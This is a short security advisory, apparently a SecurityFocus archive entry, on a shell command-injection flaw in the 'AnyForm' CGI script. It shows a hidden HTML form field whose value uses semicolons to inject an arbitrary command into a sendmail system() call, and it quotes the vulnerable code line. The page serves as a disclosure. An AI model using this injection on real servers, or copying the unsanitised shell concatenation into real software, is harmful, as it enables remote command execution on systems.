Anyform CGI Semicolon Vulnerability

Exploit as taken from the original post on this issue:

To exploit, create a form with a hidden field something like this:

<input type="hidden" name="AnyFormTo" value=";command-to-execute
with whatever arguments;/usr/lib/sendmail -t ">

Then submit the form to the "AnyForm" CGI on the server to be attacked.
The value of this parameter is passed to this code:

SystemCommand="/usr/lib/sendmail -t " + AnyFormTo + " <" + CombinedFileName;

Since system invokes a shell, the semicolons are treated as command
delimiters and anything can be inserted.


Copyright 2010, SecurityFocus